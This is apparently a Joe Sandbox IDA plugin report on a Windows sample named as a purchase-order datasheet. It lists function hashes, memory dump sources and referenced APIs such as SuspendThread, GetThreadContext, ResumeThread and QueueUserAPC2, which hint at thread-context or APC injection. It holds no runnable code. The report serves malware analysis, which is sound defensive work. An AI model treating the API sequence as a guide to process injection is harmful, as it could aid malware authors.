Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21cb066ba30a2d58ebcf8ae559d9ba3061f44fe4dc0b64825ad821ff6f3f83a3
Instruction ID: 6b601231b3a2822273d1dff5bdbe8b5a9bc9c037b662729b85ebf0a21d5ce266
Opcode Fuzzy Hash: 21cb066ba30a2d58ebcf8ae559d9ba3061f44fe4dc0b64825ad821ff6f3f83a3
Instruction Fuzzy Hash: D4D1BCB3718B8883DB599F29E0446A977A9EB69BC8F444035DF4E0BB58DF38D644C720

Function 00007FF7BD67DD30 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7da7e54ed24954a500e0de7022938a4671c5c3d7a4c5f28315c5e883fd872f53
Instruction ID: 036edeeb872f12dcbd7e25898119a4fd450ca6f17d2e12c53f890643ef9a2314
Opcode Fuzzy Hash: 7da7e54ed24954a500e0de7022938a4671c5c3d7a4c5f28315c5e883fd872f53
Instruction Fuzzy Hash: 3A611910E2C50B55E91CBF2AA8950F5D2226FBB784FD42831DF2E5B7ABBE1CE4454360

Function 00007FF7BD6081F0 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f6dc304a19f2a48ee2c861db27342cb39ee3eea17acda9183df1afc939c6c05
Instruction ID: ccf6ca9f64988cee0054dc3f4c71efa082dc0b1e71e720ff92d902fa813c6b07
Opcode Fuzzy Hash: 7f6dc304a19f2a48ee2c861db27342cb39ee3eea17acda9183df1afc939c6c05
Instruction Fuzzy Hash: 08D17E32E0DA8682E66CEB1CA880279A3A5FB66798F814135DF4D57359FF7CE4508324

Function 00007FF7BD61BC80 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d6254c0ef687fac40c48f3d506a17342e23e87eff8218f83829c6cce0c6783e
Instruction ID: 30c63b1168c50a17499584cfb765796189b6de399eaf1007d60fd90f6065e991
Opcode Fuzzy Hash: 4d6254c0ef687fac40c48f3d506a17342e23e87eff8218f83829c6cce0c6783e
Instruction Fuzzy Hash: 79C19271E0CA4681E609AB1DD850238B3A5FB27BE5F855635DB6D437A8EF7CE460C320

Function 00007FF7BD625490 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28436a9c3417000466a2d9979135604bb1afaa64b481e814e6aa6ec24cae149b
Instruction ID: 17c975f8e5c866195cad6fa8cbb526a71ef4b61de1616277613dd376836aa199
Opcode Fuzzy Hash: 28436a9c3417000466a2d9979135604bb1afaa64b481e814e6aa6ec24cae149b
Instruction Fuzzy Hash: 0CC1A271E1CA4681EA19AB0DE410174B7A6FB667F4B844235DB6D477A8FFBCE060C321

Function 00007FF7BD5F82D0 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86c9ebb636796ca0e2a1abc168f63624881ec9cfa17a1a52ac6cfbaa34e87d82
Instruction ID: 9136a604db33e19f32414f074d707601695d48d099d0a7ae7446928cf2a675ef
Opcode Fuzzy Hash: 86c9ebb636796ca0e2a1abc168f63624881ec9cfa17a1a52ac6cfbaa34e87d82
Instruction Fuzzy Hash: 9791EFB3A18B5587D71CDF29D8412A877A0FB65BA8F505239CE6D07B98EB38D811CB40

Function 00007FF7BD72D7E0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94133470a1cdfe2213458b368141420a258a13cfa6e3db9c0818582347a24da2
Instruction ID: 85563ab0fd2974470ed04c102fd071704dabdb51da67b50cc594d45f907ea9a7
Opcode Fuzzy Hash: 94133470a1cdfe2213458b368141420a258a13cfa6e3db9c0818582347a24da2
Instruction Fuzzy Hash: A6419E60A1D44399E50CBF1AEC815F99610AFABBC4FD44031EF2D8B79EFD1CA54283A0

Function 00007FF7BD609A90 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4cfc7e4d115ce1370a28ac6abb2cf91c2911c6ad5a29bc3d3fae3187189239e
Instruction ID: 30a1353d1c7272da6523ee238d389149902b1ea11a4fb983d576d749da1cb417
Opcode Fuzzy Hash: c4cfc7e4d115ce1370a28ac6abb2cf91c2911c6ad5a29bc3d3fae3187189239e
Instruction Fuzzy Hash: 1B41C491E1CB4A41E90DA73A9581624D1939F7B3E4E9CC732EA1D277D9FB6C70904510

Function 00007FF7BD61C0A0 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee72cb688372a8b7ca6c53026427fe1cb6e98e11cf675aa8f3c1fed9b58c5e49
Instruction ID: 202805268e7438bb32451041bf85c8be246629b6c16180a4b3e6a06f854f10dc
Opcode Fuzzy Hash: ee72cb688372a8b7ca6c53026427fe1cb6e98e11cf675aa8f3c1fed9b58c5e49
Instruction Fuzzy Hash: 5E411515F5DB4902EA19977F500157DD252AFAB7C8E8DA732DB0E26798FF2CE0818210

Function 00007FF7BD6B3D20 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7533faf894bf0ca9caf5f1480e5f2de4d9b878ab499b8342825ab4e25c589ece
Instruction ID: 8ac09760474fa74966f0c2ecc9954fa1e4f9450c910ee45c9726d9becc462d43
Opcode Fuzzy Hash: 7533faf894bf0ca9caf5f1480e5f2de4d9b878ab499b8342825ab4e25c589ece
Instruction Fuzzy Hash: FA31A722F0D94581EA5CAB1ED4920BCE352AB57BD8BD49036DF0D57398EE2DEC968310

Function 00007FF7BD5F39D0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: ExceptionFailFastRaise$Sleep
String ID:
API String ID: 3706814929-0
Opcode ID: b4f4eecb476bf04b12e31564723069907bbc9b466724c713cfc222d08a9c6718
Instruction ID: 821b4b5afaad61b4631ee56489222b16984781a6e9c6a1796fb93466c24a5344
Opcode Fuzzy Hash: b4f4eecb476bf04b12e31564723069907bbc9b466724c713cfc222d08a9c6718
Instruction Fuzzy Hash: 11210726B1C94542FB24EF1EE451BAAA215EFA5784F804030FF8E46A98FD3CD404C710

Function 00007FF7BD5F1C50 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8e9d75f7367e1f09548789f8d2b40ec955cb63071d47f2e06fc1c59d2d11a99
Instruction ID: dda509f9a802c0b8a780fdd2cd375f24f9a0ab3ef6eb310801fcecc52ebd34d6
Opcode Fuzzy Hash: e8e9d75f7367e1f09548789f8d2b40ec955cb63071d47f2e06fc1c59d2d11a99
Instruction Fuzzy Hash: 8CF0F810E2C50751E94DBF2EA8960F4D2226FBB780FD82431DF2E5A69BBE1CE5444768

Function 00007FF7BD5F3000 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 144librarythreadloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF7BD5FCF00
GetProcAddress.KERNEL32 ref: 00007FF7BD5FCF13
GetCurrentProcess.KERNEL32 ref: 00007FF7BD5FCF25
VerSetConditionMask.KERNEL32 ref: 00007FF7BD5FCF8B
VerSetConditionMask.KERNEL32 ref: 00007FF7BD5FCF9B
VerSetConditionMask.KERNEL32 ref: 00007FF7BD5FCFAB
VerifyVersionInfoW.KERNEL32 ref: 00007FF7BD5FCFD3
GetProcAddress.KERNEL32 ref: 00007FF7BD5FCFE7
GetLastError.KERNEL32 ref: 00007FF7BD5FD03E
SuspendThread.KERNEL32 ref: 00007FF7BD5FD058
GetThreadContext.KERNEL32 ref: 00007FF7BD5FD079
ResumeThread.KERNEL32 ref: 00007FF7BD5FD0B3

Strings

IsWow64Process2, xrefs: 00007FF7BD5FCF09
kernel32, xrefs: 00007FF7BD5FCEF3
QueueUserAPC2, xrefs: 00007FF7BD5FCFDD

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
String ID: IsWow64Process2$QueueUserAPC2$kernel32
API String ID: 2652322181-269241671
Opcode ID: 2ed5142675b828450414f6af03e9e150d3f22da0891d8269898bcd82b2a367be
Instruction ID: 82bb93483b034182361ea2cb848b54de180a21715efc34c01d19fd62cfd95eed
Opcode Fuzzy Hash: 2ed5142675b828450414f6af03e9e150d3f22da0891d8269898bcd82b2a367be
Instruction Fuzzy Hash: CC517331A1CA4281FA6CEB19B4442F9A395EF6AB95F800235DE5D4B798FF3DD405C720

Function 00007FF7BD5F3007 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 142librarythreadloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF7BD5FCF00
GetProcAddress.KERNEL32 ref: 00007FF7BD5FCF13
GetCurrentProcess.KERNEL32 ref: 00007FF7BD5FCF25
VerSetConditionMask.KERNEL32 ref: 00007FF7BD5FCF8B
VerSetConditionMask.KERNEL32 ref: 00007FF7BD5FCF9B
VerSetConditionMask.KERNEL32 ref: 00007FF7BD5FCFAB
VerifyVersionInfoW.KERNEL32 ref: 00007FF7BD5FCFD3
GetProcAddress.KERNEL32 ref: 00007FF7BD5FCFE7
GetLastError.KERNEL32 ref: 00007FF7BD5FD03E
SuspendThread.KERNEL32 ref: 00007FF7BD5FD058
GetThreadContext.KERNEL32 ref: 00007FF7BD5FD079
ResumeThread.KERNEL32 ref: 00007FF7BD5FD0B3

Strings

IsWow64Process2, xrefs: 00007FF7BD5FCF09
kernel32, xrefs: 00007FF7BD5FCEF3
QueueUserAPC2, xrefs: 00007FF7BD5FCFDD

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
String ID: IsWow64Process2$QueueUserAPC2$kernel32
API String ID: 2652322181-269241671
Opcode ID: 4825748d57e2d133e0b0926e79e8171601229c5e1e52b9d54749e5c96503095b
Instruction ID: f15a98925a714f7d717722687ccc827ef05521feeaf00183e5588c878eaac362
Opcode Fuzzy Hash: 4825748d57e2d133e0b0926e79e8171601229c5e1e52b9d54749e5c96503095b
Instruction Fuzzy Hash: AA517231A1C64281FA6CEB19B4542F9A395EFAAB91F800135DE4D4B798FF3DD4058720

Function 00007FF7BD5FDBD0 Relevance: 24.1, APIs: 8, Strings: 8, Instructions: 101stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7BD604107,?,?,?,?,00007FF7BD5FD115), ref: 00007FF7BD5FDC0E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7BD604107,?,?,?,?,00007FF7BD5FD115), ref: 00007FF7BD5FDC36
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7BD604107,?,?,?,?,00007FF7BD5FD115), ref: 00007FF7BD5FDC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7BD604107,?,?,?,?,00007FF7BD5FD115), ref: 00007FF7BD5FDC76
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7BD604107,?,?,?,?,00007FF7BD5FD115), ref: 00007FF7BD5FDC96
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7BD604107,?,?,?,?,00007FF7BD5FD115), ref: 00007FF7BD5FDCBA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7BD604107,?,?,?,?,00007FF7BD5FD115), ref: 00007FF7BD5FDCDE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7BD604107,?,?,?,?,00007FF7BD5FD115), ref: 00007FF7BD5FDD02

Strings

GCHeapHardLimitSOHPercent, xrefs: 00007FF7BD5FDCB0
GCHeapHardLimitPOHPercent, xrefs: 00007FF7BD5FDCF8
GCHeapHardLimitPOH, xrefs: 00007FF7BD5FDC8C
GCHeapHardLimitSOH, xrefs: 00007FF7BD5FDC4C
GCHeapHardLimitLOHPercent, xrefs: 00007FF7BD5FDCD4
GCHeapHardLimit, xrefs: 00007FF7BD5FDC07
GCHeapHardLimitPercent, xrefs: 00007FF7BD5FDC2C
GCHeapHardLimitLOH, xrefs: 00007FF7BD5FDC6C

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: strcmp
String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
API String ID: 1004003707-945519297
Opcode ID: a2420435b7c8d9abb28f4f8f1ce3c06c939d7a2a25c3777b265420f1345e2620
Instruction ID: 1f9a67f8deb55035903036ac7c6aeaa8c961422fbefe3a416d014deda189b3dd
Opcode Fuzzy Hash: a2420435b7c8d9abb28f4f8f1ce3c06c939d7a2a25c3777b265420f1345e2620
Instruction Fuzzy Hash: 4F41DA60A0C69640E658BB1E95441B49296AF637F8FC40332EF7C5B6DDFF5CE8928320

Function 00007FF7BD5FCBA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00007FF7BD5F3177), ref: 00007FF7BD5FCBC3
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF7BD5F3177), ref: 00007FF7BD5FCBD8
GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF7BD5F3177), ref: 00007FF7BD5FCBE5
InitializeContext.KERNEL32(?,?,?,?,?,00007FF7BD5F3177), ref: 00007FF7BD5FCC23
GetLastError.KERNEL32(?,?,?,?,?,00007FF7BD5F3177), ref: 00007FF7BD5FCC31
InitializeContext.KERNEL32(?,?,?,?,?,00007FF7BD5F3177), ref: 00007FF7BD5FCC85

Strings

InitializeContext2, xrefs: 00007FF7BD5FCBCE
kernel32.dll, xrefs: 00007FF7BD5FCBBC

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

